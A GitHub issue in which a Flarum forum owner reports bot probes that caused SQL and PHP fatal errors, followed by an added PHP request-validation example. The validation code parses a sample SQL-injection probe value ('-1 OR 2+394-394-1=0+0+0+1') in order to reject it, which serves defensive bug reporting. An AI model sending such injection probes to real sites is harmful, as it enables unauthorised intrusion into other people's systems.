Insufficient request validation - some bots generate fatal errors #3627

Closed
rob006 opened this issue Sep 5, 2022 · 0 comments · Fixed by #3795
rob006 commented Sep 5, 2022

Current Behavior

My forum was "attacked" by a bot, which sent a bunch of requests searching for SQLi, path traversal and similar vulnerabilities. While it does not seem to have achieved anything, it generated a bunch of errors, including SQL errors and PHP fatal errors.

Steps to Reproduce

Try any of these URLs:

I also got multiple POST requests to the /login endpoint, which resulted in fatal errors, but I don't know how to reproduce them, since Flarum does not log POST data:

flarum.ERROR: Laminas\Diactoros\Exception\InvalidArgumentException: Laminas\Diactoros\ServerRequest::withParsedBody expects a null, array, or object argument; received string in vendor/laminas/laminas-diactoros/src/ServerRequest.php:17

Expected Behavior

No exceptions or fatal errors. The engine should validate requests and return a 400 Bad Request response if the request is invalid.

Screenshots

No response

Environment

  • Flarum version: 1.4.1
  • Website URL: -
  • Webserver: apache
  • Hosting environment: VPS
  • PHP version: 7.4

Output of php flarum info

Flarum core 1.4.1
PHP version: 7.4.30
MySQL version: 5.7.39-0ubuntu0.18.04.2-log
Loaded extensions: Core, date, libxml, openssl, pcre, zlib, filter, hash, pcntl, Reflection, SPL, session, standard, sodium, mysqlnd, PDO, xml, apcu, calendar, ctype, curl, dom, mbstring, FFI, fileinfo, ftp, gd, geoip, gettext, iconv, imagick, intl, json, exif, mcrypt, mysqli, pdo_mysql, apc, posix, readline, shmop, SimpleXML, sockets, sysvmsg, sysvsem, sysvshm, tokenizer, xmlreader, xmlwriter, xsl, zip, Phar, Zend OPcache
+--------------------------------------+------------+------------------------------------------+
| Flarum Extensions                    |            |                                          |
+--------------------------------------+------------+------------------------------------------+
| ID                                   | Version    | Commit                                   |
+--------------------------------------+------------+------------------------------------------+
| flarum-flags                         | v1.4.0     |                                          |
| flarum-subscriptions                 | v1.4.0     |                                          |
| flarum-tags                          | v1.4.0     |                                          |
| flarum-suspend                       | v1.4.0     |                                          |
| flarum-sticky                        | v1.4.0     |                                          |
| flarum-lock                          | v1.4.0     |                                          |
| flarum-approval                      | v1.4.0     |                                          |
| fof-follow-tags                      | 1.1.6      |                                          |
| v17development-seo                   | v1.8.0     |                                          |
| sycho-move-posts                     | v0.1.7     |                                          |
| kilowhat-audit-free                  | 1.5.1      |                                          |
| ianm-syndication                     | 1.2.2      |                                          |
| fof-user-directory                   | 1.2.3      |                                          |
| fof-user-bio                         | 1.1.0      |                                          |
| fof-upload                           | 1.2.3      |                                          |
| fof-spamblock                        | 1.0.2      |                                          |
| fof-socialprofile                    | 1.1.4      |                                          |
| fof-sitemap                          | 1.0.3      |                                          |
| fof-polls                            | 1.1.0      |                                          |
| fof-nightmode                        | 1.4.1      |                                          |
| fof-links                            | 1.1.1      |                                          |
| fof-gamification                     | dev-master | f8e99f29371fbdc7f7a9311f546ac78e9735f9f4 |
| fof-formatting                       | 1.0.2      |                                          |
| fof-default-user-preferences         | 1.1.1      |                                          |
| fof-best-answer                      | 1.2.3      |                                          |
| flarum-statistics                    | dev-master | 432321416d291f7e376121c877466dfba93ecb74 |
| flarum-pusher                        | v1.4.0     |                                          |
| flarum-mentions                      | v1.4.0     |                                          |
| flarum-markdown                      | v1.4.0     |                                          |
| flarum-likes                         | v1.4.0     |                                          |
| flarum-lang-english                  | v1.4.0     |                                          |
| flarum-emoji                         | v1.4.0     |                                          |
| flarum-bbcode                        | v1.4.0     |                                          |
| clarkwinkelmann-readonly-profile     | 1.0.0      |                                          |
| clarkwinkelmann-discussion-bookmarks | 2.0.0      |                                          |
| blomstra-usercard-stats              | 0.1.2      |                                          |
| blomstra-notification-deleter        | 0.2.1      |                                          |
| askvortsov-moderator-warnings        | v0.6.1     |                                          |
| askvortsov-discussion-templates      | v0.8.3     |                                          |
+--------------------------------------+------------+------------------------------------------+
Base URL: -
Installation path: -
Queue driver: redis
Mail driver: smtp
Debug mode: off

Possible Solution

No response

Additional Context

No response
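One way to enforce the 400 Bad Request behaviour the issue asks for, as an added example that is not Flarum's own code: a small validation layer for the query parameters the probes abuse and for the parsed-body shape that `withParsedBody()` requires. `MAX_LIMIT` and the function names are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not Flarum's own code: validate the parameters the probes above
// abuse (page[limit|offset|near], filter[discussion]) and the parsed-body shape
// before the query builder runs. MAX_LIMIT and function names are assumptions.
const MAX_LIMIT = 50;

/** True only for a plain decimal string such as "47"; rejects "-1 OR 1=1". */
function isNonNegativeInt($value, int $max = PHP_INT_MAX): bool
{
    $opts = ['options' => ['min_range' => 0, 'max_range' => $max]];
    return is_string($value) && filter_var($value, FILTER_VALIDATE_INT, $opts) !== false;
}

/** Returns null when the query is acceptable, otherwise a reason for a 400. */
function validateApiQuery(array $query): ?string
{
    $page = $query['page'] ?? [];
    $filter = $query['filter'] ?? [];
    if (!is_array($page) || !is_array($filter)) {
        return 'page and filter must be arrays';
    }
    if (isset($page['limit']) && !isNonNegativeInt($page['limit'], MAX_LIMIT)) {
        return 'page[limit] must be an integer between 0 and ' . MAX_LIMIT;
    }
    foreach (['offset', 'near'] as $key) {
        if (isset($page[$key]) && !isNonNegativeInt($page[$key])) {
            return "page[$key] must be a non-negative integer";
        }
    }
    if (isset($filter['discussion']) && !isNonNegativeInt($filter['discussion'])) {
        return 'filter[discussion] must be a discussion id';
    }
    return null;
}

/** Same precondition as Laminas ServerRequest::withParsedBody(): null, array or object. */
function validateParsedBody($body): ?string
{
    return ($body === null || is_array($body) || is_object($body))
        ? null : 'request body must decode to a JSON object or array';
}

// Constructed sample: the raw query string of the first probe listed in the issue.
parse_str('page[limit]=-1%20OR%202%2B394-394-1=0%2B0%2B0%2B1&page[offset]=20', $query);
$reason = validateApiQuery($query) ?? validateParsedBody(json_decode('"just a string"'));
http_response_code($reason === null ? 200 : 400);
echo $reason ?? 'ok', PHP_EOL;
```

Because the check runs on the raw strings before any casting, a value like `-1 OR 2+394-394-1=0+0+0+1` is rejected with a 400 instead of reaching the SQL layer.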

@rob006 rob006 added the type/bug label Sep 5, 2022
@SychO9 SychO9 self-assigned this Apr 15, 2023
@SychO9 SychO9 added this to the 1.8 milestone Apr 15, 2023